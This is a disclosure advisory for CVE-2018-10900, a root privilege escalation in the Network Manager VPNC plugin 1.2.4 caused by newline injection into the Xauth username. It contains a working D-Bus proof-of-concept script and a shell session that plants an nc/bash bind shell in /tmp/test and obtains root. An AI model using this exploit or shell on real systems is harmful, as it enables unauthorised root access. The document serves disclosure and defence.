Network Manager VPNC - Privilege Escalation (CVE-2018-10900)

Jul 21 2018

The Network Manager VPNC plugin is vulnerable to a privilege escalation attack. A new line character can be used to inject a Password helper parameter into the configuration data passed to VPNC, allowing an attacker to execute arbitrary commands as root.

Date Released: 21/07/2018
CVE: CVE-2018-10900
Author: Denis Andzakovic
Source: https://gitlab.gnome.org/GNOME/NetworkManager-vpnc
Affected Software: Network Manager VPNC – 1.2.4

Privilege Escalation

When initiating a VPNC connection, Network Manager spawns a new vpnc process and passes the configuration via STDIN. By injecting a \n character into a configuration parameter, an attacker can coerce Network Manager to set the Password helper option to an attacker controlled executable file.

The following python script generates a VPNC connection which will execute the /tmp/test file when connected. The new line character is injected into the Xauth username parameter.

vpnc_privesc.py

import dbus
con = {
    'vpn':{
        'service-type':'org.freedesktop.NetworkManager.vpnc',
        'data':{
            'IKE DH Group':'dh2',
            'IPSec ID':'testgroup',
            'IPSec gateway':'gateway',
            'IPSec secret-flags':'4',
            'Local Port':'0',
            'NAT Traversal Mode': 'natt',
            'Perfect Forward Secrecy': 'server',
            'Vendor': 'cisco',
            'Xauth password-flags': '4',
            'Xauth username': "username\nPassword helper /tmp/test",
            'ipsec-secret-type': 'unused',
            'xauth-password-type': 'unused'
            }
    },
    'connection':{
        'type':'vpn',
        'id':'vpnc_test',
    },
    'ipv4':{'method':'auto'},
    'ipv6':{'method':'auto'}
}
bus = dbus.SystemBus()
proxy = bus.get_object("org.freedesktop.NetworkManager", "/org/freedesktop/NetworkManager/Settings")
settings = dbus.Interface(proxy, "org.freedesktop.NetworkManager.Settings")
settings.AddConnection(con)

The above results in the following configuration being passed to the vpnc process when the connection is initialized:

VPNC Configuration

Debug 0
Script /usr/local/libexec/nm-vpnc-service-vpnc-helper 0 3950  --bus-name org.freedesktop.NetworkManager.vpnc.Connection_4
Cisco UDP Encapsulation Port 0
Local Port 0
IKE DH Group dh2
Perfect Forward Secrecy server
Xauth username username
Password helper /tmp/test
IPSec gateway gateway
IPSec ID testgroup
Vendor cisco
NAT Traversal Mode natt

The following figure details the complete privilege escalation attack.

Network Manager VPNC Privilege Escalation

doi@ubuntu:~$ cat << EOF > /tmp/test
> #!/bin/bash
> mkfifo pipe
> nc -k -l -p 8080 < pipe | /bin/bash > pipe
> EOF
doi@ubuntu:~$ python vpnc_privesc.py
doi@ubuntu:~$ nmcli connection
NAME                UUID                                  TYPE      DEVICE
Wired connection 1  a8b178fd-8cbc-3e15-aa9e-d52982215d98  ethernet  ens3
vpnc_test           233101cb-f786-44ed-9e4f-662f1a519429  vpn       ens3
doi@ubuntu:~$ nmcli connection up vpnc_test

^Z
[1]+  Stopped                 nmcli connection up vpnc_test
doi@ubuntu:~$ nc -vv 127.0.0.1 8080
Connection to 127.0.0.1 8080 port [tcp/http-alt] succeeded!
id
uid=0(root) gid=0(root) groups=0(root)

Timeline

11/07/2018 - Advisory sent to security@gnome.org
13/07/2018 - Acknowledgement from Gnome security
20/07/2018 - CVE-2018-10900 assigned, patch scheduled for the following day
21/07/2018 - Network Manager VPNC 1.2.6 released
21/07/2018 - Advisory released